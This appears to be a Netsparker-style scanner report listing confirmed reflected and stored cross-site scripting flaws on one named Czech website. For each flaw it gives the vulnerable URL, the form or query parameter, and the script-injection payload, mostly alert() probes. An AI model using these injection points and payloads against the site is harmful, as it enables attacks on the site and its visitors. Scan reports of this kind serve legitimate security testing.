pucika.zlatas.cz

1. ||| XSS (Cross-site Scripting)
2.  
3. Severity : Important
4. Confirmation : Confirmed
5. Detection Accuracy :
6. Vulnerable URL : http://pucika.zlatas.cz/?page=a1&action=reg
7. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
8. Parameter Name: EMAIL
9. Parameter Type: Post
10. Attack Pattern: '"--></style></script><script>alert(0x0000A9)</script>
11.  
12. Severity : Important
13. Confirmation : Confirmed
14. Detection Accuracy :
15. Vulnerable URL : http://pucika.zlatas.cz/?page=a1&action=reg
16. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
17. Parameter Name: JMENO
18. Parameter Type: Post
19. Attack Pattern: '"--></style></script><script>alert(0x0000B0)</script>
20.  
21. Severity : Important
22. Confirmation : Confirmed
23. Detection Accuracy :
24. Vulnerable URL : http://pucika.zlatas.cz/?page=b1&action=login
25. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
26. Parameter Name: USERNAME
27. Parameter Type: Post
28. Attack Pattern: '"--></style></script><script>alert(0x0000D8)</script>
29.  
30. Severity : Important
31. Confirmation : Confirmed
32. Detection Accuracy :
33. Vulnerable URL : http://pucika.zlatas.cz/?page=a1&action=reg
34. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
35. Parameter Name: PRIJMENI
36. Parameter Type: Post
37. Attack Pattern: '"--></style></script><script>alert(0x0001B0)</script>
38.  
39. Severity : Important
40. Confirmation : Confirmed
41. Detection Accuracy :
42. Vulnerable URL : http://pucika.zlatas.cz/?page=a2&action=sendreg
43. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
44. Parameter Name: EMAIL
45. Parameter Type: Post
46. Attack Pattern: '"--></style></script><script>alert(0x0001B7)</script>
47.  
48. Severity : Important
49. Confirmation : Confirmed
50. Detection Accuracy :
51. Vulnerable URL : http://pucika.zlatas.cz/?page=a1&action=reg
52. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
53. Parameter Name: USERNAME
54. Parameter Type: Post
55. Attack Pattern: '"--></style></script><script>alert(0x0001C0)</script>
56.  
57. Severity : Important
58. Confirmation : Confirmed
59. Detection Accuracy :
60. Vulnerable URL : http://pucika.zlatas.cz/gallery/?folder="><script>alert(9)</script>&gname=Brigáda a rozehrávání 2011
61. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
62. Parameter Name: folder
63. Parameter Type: Querystring
64. Attack Pattern: "><script>alert(9)</script>
65.  
66. Severity : Important
67. Confirmation : Confirmed
68. Detection Accuracy :
69. Vulnerable URL : http://pucika.zlatas.cz/gallery/?folder=20111109-20110000_brigada-a-rozehravani-2011&gname='"--></style></script><script>alert(0x0002F9)</script>
70. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
71. Parameter Name: gname
72. Parameter Type: Querystring
73. Attack Pattern: '"--></style></script><script>alert(0x0002F9)</script>
74.  
75. Severity : Important
76. Confirmation : Confirmed
77. Detection Accuracy :
78. Vulnerable URL : http://pucika.zlatas.cz/?page=b1&action=login
79. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
80. Parameter Name: USERNAME
81. Parameter Type: Post
82. Attack Pattern: '"--></style></script><script>alert(0x0003A8)</script>
83.  
84. Severity : Important
85. Confirmation : Confirmed
86. Detection Accuracy :
87. Vulnerable URL : http://pucika.zlatas.cz/pucika/gallery/index.php?img='"--></style></script><script>alert(0x0003B2)</script>&gname=BrigAƒÂ!da
88. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
89. Parameter Name: img
90. Parameter Type: Querystring
91. Attack Pattern: '"--></style></script><script>alert(0x0003B2)</script>
92.  
93. Severity : Important
94. Confirmation : Confirmed
95. Detection Accuracy :
96. Vulnerable URL : http://pucika.zlatas.cz/pucika/gallery/index.php?img=20111109-20110000_brigada-a-rozehravani-2011/003.JPG&gname='"--></style></script><script>alert(0x0003B6)</script>
97. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
98. Parameter Name: gname
99. Parameter Type: Querystring
100. Attack Pattern: '"--></style></script><script>alert(0x0003B6)</script>
101.  
102. Severity : Important
103. Confirmation : Confirmed
104. Detection Accuracy :
105. Vulnerable URL : http://pucika.zlatas.cz/pucika/gallery/index.php?img='"--></style></script><script>alert(0x0003BC)</script>&dalsi=1000&gname=BrigA!da
106. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
107. Parameter Name: img
108. Parameter Type: Querystring
109. Attack Pattern: '"--></style></script><script>alert(0x0003BC)</script>
110.  
111. Severity : Important
112. Confirmation : Confirmed
113. Detection Accuracy :
114. Vulnerable URL : http://pucika.zlatas.cz/pucika/gallery/index.php?img=20111109-20110000_brigada-a-rozehravani-2011/001.JPG&dalsi=1000&gname='"--></style></script><script>alert(0x0003D2)</script>
115. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
116. Parameter Name: gname
117. Parameter Type: Querystring
118. Attack Pattern: '"--></style></script><script>alert(0x0003D2)</script>
119.  
120. Severity : Important
121. Confirmation : Confirmed
122. Detection Accuracy :
123. Vulnerable URL : http://pucika.zlatas.cz/pucika/gallery/index.php?dalsi=1000&folder='"--></style></script><script>alert(0x0003E0)</script>&gname=BrigAƒÂ!da
124. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
125. Parameter Name: folder
126. Parameter Type: Querystring
127. Attack Pattern: '"--></style></script><script>alert(0x0003E0)</script>
128.  
129. Severity : Important
130. Confirmation : Confirmed
131. Detection Accuracy :
132. Vulnerable URL : http://pucika.zlatas.cz/pucika/gallery/index.php?dalsi=1000&folder=20111109-20110000_brigada-a-rozehravani-2011&gname='"--></style></script><script>alert(0x0003E1)</script>
133. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
134. Parameter Name: gname
135. Parameter Type: Querystring
136. Attack Pattern: '"--></style></script><script>alert(0x0003E1)</script>
137.  
138. ||| Permanent Cross-site Scripting
139.  
140. Severity : Important
141. Confirmation : Confirmed
142. Detection Accuracy :
143. Vulnerable URL : http://pucika.zlatas.cz/?page=;ns:expression(netsparker(0x0000BA));&action=sendreg
144. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
145. Injection URL: http://pucika.zlatas.cz/?page=a1&action=reg
146. Parameter Name: page
147. Parameter Type: Querystring
148. Attack Pattern: ;ns:expression(netsparker(0x0000BA));
149.  
150. ||| [Possible] Permanent Cross-site Scripting
151.  
152. Severity : Important
153. Confirmation : Confirmed
154. Detection Accuracy :
155. Vulnerable URL : http://pucika.zlatas.cz/?page=a1&action=reg
156. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
157. Injection URL: http://pucika.zlatas.cz/?page=a1&action=reg
158. Parameter Name: EMAIL
159. Parameter Type: Post
160. Attack Pattern: '+NSFTW+'